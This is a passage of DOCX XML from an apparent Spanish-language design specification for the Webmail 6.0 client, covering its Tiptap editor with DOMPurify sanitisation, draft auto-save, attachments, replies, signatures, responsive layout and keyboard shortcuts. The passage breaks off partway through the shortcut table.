        <w:t xml:space="preserve">[46]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La barra de herramientas flota sobre el editor con botones para: negrita, itálica, lista ordenada, lista desordenada, enlace (con diálogo de URL), cita en bloque, y adjuntar archivos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La configuración de Tiptap incluye las extensiones:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">StarterKit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con autolink habilitado),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Placeholder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(configurado con el texto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Escribe tu mensaje…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">History</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(undo/redo nativo). El editor ocupa el 100% del ancho del contenedor con un área de texto de altura mínima 200px y máxima 600px (scroll vertical), borde de 1px</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#DADCE0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, radio de esquina 8px, y padding de 16px.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dado que ProseMirror tiene vulnerabilidades XSS documentadas en DOMSerializer cuando los atributos de nodo no se validan adecuadamente, todo HTML producido por Tiptap se sanitiza con DOMPurify antes de almacenar o enviar, configurando tags permitidos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">br</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">li</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y atributos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), prohibiendo explícitamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iframe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y atributos de manejadores de eventos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[64]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[69]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:id="109" w:name="auto-save-cada-10-segundos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3.2 Auto-save cada 10 Segundos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El compositor implementa auto-save con debounce de 10 segundos usando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">setInterval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. En cada ciclo, si el contenido ha cambiado desde el último guardado, el draft se envía al backend vía endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/drafts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con el payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ accountId, threadId, to, cc, bcc, subject, bodyHtml, bodyText, attachments }</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un indicador visual en la esquina inferior izquierda muestra tres estados:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Guardando…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(puntos animados),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Guardado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(checkmark verde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#34A853</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con timestamp), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Error al guardar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(icono de alerta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#EA4335</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con opción de reintentar).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los drafts se almacenan en MongoDB con TTL de 30 días. La recuperación de draft interrumpido funciona mediante detección de drafts no enviados al cargar el compositor — si existe un draft en progreso para la cuenta activa, se muestra un toast con opción de restaurar o descartar.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="X011abe43c6d65bd131c9cb4be2da10f84ba66f7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3.3 Adjuntos: Drag-and-Drop, Preview Thumbnails, Límite 25MB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La zona de adjuntos soporta dos métodos de entrada: drag-and-drop y selección manual mediante input file. El área de drop es un contenedor de mínimo 200×100px con borde discontinuo 2px</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#DADCE0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que cambia a borde sólido azul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#1A73E8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">durante el arrastre activo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[103]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[104]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Los archivos se validan client-side antes de upload: tamaño máximo 25MB por archivo (límite de Gmail), tipos permitidos (lista blanca de 50 extensiones comunes), y escaneo de tipo MIME real vía magic numbers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez adjuntados, cada archivo se muestra como una tarjeta de preview de 120×80px con: icono/thumbnail (imágenes muestran thumbnail generado con canvas, otros archivos muestran icono de tipo), nombre truncado a 20 caracteres, tamaño formateado (KB/MB), y botón de eliminar (×). Para imágenes, el thumbnail se genera con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">URL.createObjectURL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y redimensionamiento a 120×80px vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;canvas&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El progreso de upload se visualiza como barra horizontal sobre cada tarjeta, animada con transición CSS width.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:id="111" w:name="replyreply-allforward-con-quote"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3.4 Reply/Reply-all/Forward con Quote</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los modos de respuesta implementan tres variantes: Reply (responde al remitente), Reply-all (añade CC a todos los destinatarios del hilo), y Forward (reenvía el mensaje completo con adjuntos originales). En Reply y Reply-all, el cuerpo del mensaje original se inserta como cita en bloque al final del editor, precedido por la línea de atribución:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El día {fecha}, {nombre_remitente} escribió:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La cita se renderiza con borde izquierdo gris</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#DADCE0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de 2px, padding izquierdo 8px, y color de texto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#5F6368</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En Forward, el asunto se prefija automáticamente con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fwd:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(si no existe ya). El cuerpo incluye el mensaje original completo como cita y los adjuntos originales se ofrecen como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Adjuntos en línea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que el usuario puede incluir o descartar individualmente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:id="112" w:name="firmas-configurables-por-cuenta"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3.5 Firmas Configurables por Cuenta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada cuenta de correo puede tener una firma configurable HTML (editada con un Tiptap inline de una sola línea) y una versión texto plano auto-generada. La firma se inserta automáticamente al final del cuerpo del mensaje en modo composición, separada por dos guiones y un salto de línea (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-- \n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, convención de firma de correo). Las firmas se almacenan en la configuración de cuenta en MongoDB y se pueden desactivar globalmente o por mensaje mediante un checkbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Incluir firma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkStart w:id="117" w:name="responsive-design"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Responsive Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El diseño responsive para clientes de correo debe manejar tres breakpoints clave: &lt;480px (móvil, columna única), 481-768px (tabletas), y 769px+ (desktop, multi-panel). En 2025, más del 70% de las aperturas de correo ocurren en dispositivos móviles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[44]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[45]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="114" w:name="desktop-769px"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4.1 Desktop (769px+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En desktop, los tres paneles se visualizan simultáneamente: sidebar izquierda (256px, colapsable a 72px de iconos solo), panel central de lista (variable), y reading pane derecho (40% del espacio restante). La separación entre paneles es arrastrable (drag handle de 4px con cursor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">col-resize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), permitiendo al usuario ajustar los anchos. Los valores de ancho se persisten en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y se restauran en sesiones posteriores.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkStart w:id="115" w:name="tablet-481-768px"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4.2 Tablet (481-768px)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En tablet, el sidebar se colapsa automáticamente al modo icono (72px de ancho) mostrando solo los iconos de las carpetas sin texto. Un botón de hamburguesa en la esquina superior izquierda expande el sidebar completo como overlay de 256px sobre el panel central con backdrop oscurecido (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rgba(0,0,0,0.5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). El reading pane se ocupa el 60% del viewport cuando está activo, deslizándose desde la derecha sobre el panel central con transición de 300ms ease-in-out. La lista de emails muestra solo remitente, asunto truncado y timestamp.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:id="116" w:name="mobile-480px"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4.3 Mobile (&lt;480px)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En móvil, la aplicación adopta una vista apilada de tres niveles: Nivel 1 (sidebar como menú hamburger que ocupa pantalla completa), Nivel 2 (lista de emails a pantalla completa con barra de búsqueda fija en la parte superior), y Nivel 3 (reading pane que se abre como pantalla completa con botón de retroceso). La navegación entre niveles usa transiciones de slide horizontal (300ms, easing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cubic-bezier(0.4, 0, 0.2, 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Los tap targets tienen un mínimo de 44-48px de altura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[44]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y la fuente base es de 16px para evitar zoom automático de inputs en iOS.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkEnd w:id="117"/>
    <w:bookmarkStart w:id="118" w:name="keyboard-shortcuts-gmail-style"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.5 Keyboard Shortcuts (Gmail-style)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 implementa atajos de teclado estilo Gmail mediante un composable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useKeyboardShortcuts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que escucha eventos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">keydown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a nivel de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El composable implementa un sistema de secuencias: la tecla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">activa un modo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">goto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que espera una segunda tecla (navegación), mientras que las teclas individuales ejecutan acciones inmediatas. El sistema evita interceptar cuando el foco está en un input, textarea o el editor Tiptap.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="2262"/>
        <w:gridCol w:w="3677"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Atajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Acción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a Inbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Navega a la carpeta de entrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">s</w:t>
